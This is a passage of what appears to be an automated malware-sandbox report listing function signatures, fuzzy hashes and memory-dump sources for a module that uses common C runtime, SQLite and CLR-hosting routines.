                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugOutputString$AddressFreeHandleHeapModuleProc
                                                                                                                                          • String ID: API called without activation$API called without license: %ld (0x%lx)$PRAGMA page_count
                                                                                                                                          • API String ID: 323638051-2855109959
                                                                                                                                          • Opcode ID: 0ed92a6e947227e400705dd0be345b766333ae9d39c5e387351c67d9e806e4e5
                                                                                                                                          • Instruction ID: 0924389fb91bc44105ea46a84940f501e9bfc722f4c0b4896738ff6ffdaa64ae
                                                                                                                                          • Opcode Fuzzy Hash: 0ed92a6e947227e400705dd0be345b766333ae9d39c5e387351c67d9e806e4e5
                                                                                                                                          • Instruction Fuzzy Hash: C0D1912AF08B8681E7118B399821BFD2360FB94B88F449235DF5D4769AEF3CE5C58300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _handle_error
                                                                                                                                          • String ID: !$VUUU$fmod
                                                                                                                                          • API String ID: 1757819995-2579133210
                                                                                                                                          • Opcode ID: 0a2296e2cc2c192fc8cf10e9e28824e374f36c164843ed6a42680754565d6b7c
                                                                                                                                          • Instruction ID: 564bee2dacc60add6f16e7fba181bb19c431d4c7e94c11d4100298bdf85e5488
                                                                                                                                          • Opcode Fuzzy Hash: 0a2296e2cc2c192fc8cf10e9e28824e374f36c164843ed6a42680754565d6b7c
                                                                                                                                          • Instruction Fuzzy Hash: 69B1ED25F1CFC545E7A38A3464617FAB259AFAB391F10C332D96E35AA4DF2C94C28700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB1BD4
                                                                                                                                            • Part of subcall function 00007FFDF7CAD6F4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFDF7CAD6D2), ref: 00007FFDF7CAD6FD
                                                                                                                                            • Part of subcall function 00007FFDF7CAD6F4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFDF7CAD6D2), ref: 00007FFDF7CAD721
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                          • String ID: *?$.
                                                                                                                                          • API String ID: 4036615347-3972193922
                                                                                                                                          • Opcode ID: ba49eb8bdd0d3c5667b6a49b38d1b5bbf7d7fd221cdccd7b19d09b57c7884ac6
                                                                                                                                          • Instruction ID: 5956a5bc84e967caef953ee78fb1e1cb2faef49e75a2d733633a88b6fda3e4a2
                                                                                                                                          • Opcode Fuzzy Hash: ba49eb8bdd0d3c5667b6a49b38d1b5bbf7d7fd221cdccd7b19d09b57c7884ac6
                                                                                                                                          • Instruction Fuzzy Hash: B751C16AF14B9586EB11DFA6A8208FD67A4FB54BD8B444531EE2D17BC9DE3CD0518300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ContextCryptRelease
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 829835001-0
                                                                                                                                          • Opcode ID: eb429f9e11284ecf835b6a58d229ed5bdb84f0074435d393edd3b9aa5fac39f0
                                                                                                                                          • Instruction ID: 2a196f16231dd43ac5b026ab3f442fc46cec921b780abacc44888b1aad5eeb33
                                                                                                                                          • Opcode Fuzzy Hash: eb429f9e11284ecf835b6a58d229ed5bdb84f0074435d393edd3b9aa5fac39f0
                                                                                                                                          • Instruction Fuzzy Hash: DBE0122DF46246C5FF699B65B874BB822605F9CB44F589130E92E062C9DE3C54E58640
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugHeapOutputString$AllocFreeTrustVerify
                                                                                                                                          • String ID: cannot trust, cannot allocate.$cannot trust, heap invalid.$cannot trust, no module file name.
                                                                                                                                          • API String ID: 133523416-3277164374
                                                                                                                                          • Opcode ID: a111077ec395828ad44bbf49c10331e97aa6e55935c10e2f2f2ef4da38a20de8
                                                                                                                                          • Instruction ID: e1ccc910edbbc8b27323037967a3f9d90539566cf5ac96110dd2a25cef22ce98
                                                                                                                                          • Opcode Fuzzy Hash: a111077ec395828ad44bbf49c10331e97aa6e55935c10e2f2f2ef4da38a20de8
                                                                                                                                          • Instruction Fuzzy Hash: D3415135B08A82CAF710CF65E864BED37A2AB48B58F444235DE1D576DCEF7C94498740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                          • API String ID: 3215553584-2617248754
                                                                                                                                          • Opcode ID: 431d28ebabc8565c10fbdd6955dc7b829cb458b6cd5c121fb79e91223151176a
                                                                                                                                          • Instruction ID: 64d937c92837b970a5e05a56799b0b5f7847210f75ea9c5e538b6593e7575123
                                                                                                                                          • Opcode Fuzzy Hash: 431d28ebabc8565c10fbdd6955dc7b829cb458b6cd5c121fb79e91223151176a
                                                                                                                                          • Instruction Fuzzy Hash: 64419C7AB09B8589F700CF25E861BED33A4EB15798F044536EE6D0BB98DE3DD1298340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugOutputString
                                                                                                                                          • String ID: VerifyClrCleanup$done with cleanup.$eeeSdk1: %s HRESULT 0x%016X$invalid ICLRRuntimeHost pointer.$invalid ICLRRuntimeHost.
                                                                                                                                          • API String ID: 1166629820-803544626
                                                                                                                                          • Opcode ID: dfd235dc89044e830d0663335d1feb6957c3838e51d008614289ecca82846f2d
                                                                                                                                          • Instruction ID: 2db7f2edd228a4e50fb48da33ad85e7ea21dc81a66509ef91f3c0ed7acd0ed01
                                                                                                                                          • Opcode Fuzzy Hash: dfd235dc89044e830d0663335d1feb6957c3838e51d008614289ecca82846f2d
                                                                                                                                          • Instruction Fuzzy Hash: FC111C29B28A82D2FB11DB20F875BF92361BF88B04F804136D96E466D8EF3DD544C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: +$-$f$p
                                                                                                                                          • API String ID: 3215553584-588565063
                                                                                                                                          • Opcode ID: 18cdb82c33907fb803bb1e5d23cd3fcdbf2b03280e4c7c547309946e042c8b78
                                                                                                                                          • Instruction ID: 68773a52f8be05d11cc9c9ceb767e2934d1d608d3d4771f35a98af6f78174f4f
                                                                                                                                          • Opcode Fuzzy Hash: 18cdb82c33907fb803bb1e5d23cd3fcdbf2b03280e4c7c547309946e042c8b78
                                                                                                                                          • Instruction Fuzzy Hash: B612812AF1814386FB209B15E438AFE6653FB54B56F944231E6F91B6CCCB3DE9408B44
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FFDF7CAF55B
                                                                                                                                            • Part of subcall function 00007FFDF7CAEACC: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEAE0
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FFDF7CAF56C
                                                                                                                                            • Part of subcall function 00007FFDF7CAEA6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEA80
                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FFDF7CAF57D
                                                                                                                                            • Part of subcall function 00007FFDF7CAEA9C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEAB0
                                                                                                                                            • Part of subcall function 00007FFDF7CAC8AC: HeapFree.KERNEL32(?,?,00000000,00007FFDF7CADBDB,?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000), ref: 00007FFDF7CAC8C2
                                                                                                                                            • Part of subcall function 00007FFDF7CAC8AC: GetLastError.KERNEL32(?,?,00000000,00007FFDF7CADBDB,?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000), ref: 00007FFDF7CAC8D4
                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDF7CAF7DD), ref: 00007FFDF7CAF5A4
                                                                                                                                          • WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CAF63A
                                                                                                                                          • WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CAF686
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                          • String ID: ?
                                                                                                                                          • API String ID: 500310315-1684325040
                                                                                                                                          • Opcode ID: c87be684c8d8dbe1b2cece34fb08483f7c6331edfb0cc895426dac4484e7cc59
                                                                                                                                          • Instruction ID: bc911981228153c29be2f94b65042e8eb51810a216c39ad0259107b124b52289
                                                                                                                                          • Opcode Fuzzy Hash: c87be684c8d8dbe1b2cece34fb08483f7c6331edfb0cc895426dac4484e7cc59
                                                                                                                                          • Instruction Fuzzy Hash: 7D618D3AF0864286F7509F20E8709ED7BA4FB88794F440136EA6E4B6E9DF3CD9518750
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _set_statfp
                                                                                                                                          • String ID: "$cosh
                                                                                                                                          • API String ID: 1156100317-3800341493
                                                                                                                                          • Opcode ID: 10f1eb77e07d5d9682f41bee9aa1c77003cc7ed58aa9e9aa20d022d0afb58274
                                                                                                                                          • Instruction ID: b3225a0a4e162e16e4d3062cae50847e925ac84f6c5e024613d5c064d4c0cebe
                                                                                                                                          • Opcode Fuzzy Hash: 10f1eb77e07d5d9682f41bee9aa1c77003cc7ed58aa9e9aa20d022d0afb58274
                                                                                                                                          • Instruction Fuzzy Hash: 14819925F28FC588E3638B3494617FA7358AF6A3D5F119337D56E366A5DF2CA0828600
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                          • Opcode ID: c6323586da4edf6de2700d7ac411e7cc218df0fa7115b9235c3ab1ed59015440
                                                                                                                                          • Instruction ID: df3cbdffbbf7bcdadfdcf2c32ef112de38ed4a7744c0f8e4c84f04c0e297a3b0
                                                                                                                                          • Opcode Fuzzy Hash: c6323586da4edf6de2700d7ac411e7cc218df0fa7115b9235c3ab1ed59015440
                                                                                                                                          • Instruction Fuzzy Hash: 60F04469B19B8781FF448B11F8B4AF96360EF88B91F881135D92F466ACDE3CD484C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a98bd3957bab17e9afb37376b2856478995e11a05b8d07082f607296a44f1422
                                                                                                                                          • Instruction ID: e345a6f8f5d5e61cbb76f76ab18d29f1a649f3be93852b1783ad58880e69a857
                                                                                                                                          • Opcode Fuzzy Hash: a98bd3957bab17e9afb37376b2856478995e11a05b8d07082f607296a44f1422
                                                                                                                                          • Instruction Fuzzy Hash: B1A1C16AB0878249FB608B689470BFD66D5AF44BA4F484635EA3D077C9DF3CD4748780
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: ad6755d9bc6c2d2c1049bf8c83b093eff4b5d739628207f99e0a129a86b41aa0
                                                                                                                                          • Instruction ID: 5f5bf32b8c26d959745c7911ca0b40bbb6bdd7a2244785645b73690959e03659
                                                                                                                                          • Opcode Fuzzy Hash: ad6755d9bc6c2d2c1049bf8c83b093eff4b5d739628207f99e0a129a86b41aa0
                                                                                                                                          • Instruction Fuzzy Hash: F181A52AF1865289F7219F6A9460AFD27A0BF48794F404136ED2E577E9DF3CE861C310
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3659116390-0
                                                                                                                                          • Opcode ID: 894bc5ef5e5ce7df39513d38449063517b4f88948e0e894e952ffd6e864881c1
                                                                                                                                          • Instruction ID: 05228bdbd06323864a44057a4a143fad7097855c050eca733789cdd9a2ae6600
                                                                                                                                          • Opcode Fuzzy Hash: 894bc5ef5e5ce7df39513d38449063517b4f88948e0e894e952ffd6e864881c1
                                                                                                                                          • Instruction Fuzzy Hash: 2151B03AB18A5185E711CB7AD854BEC3BB0FB48B88F058136DE2E576A8DF38D155C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000,FFFFFFFF,00007FFDF7CAE057,?,?,00000000,00007FFDF7CADBEB,?,?,?,00007FFDF7CA7B91), ref: 00007FFDF7CADDAE
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
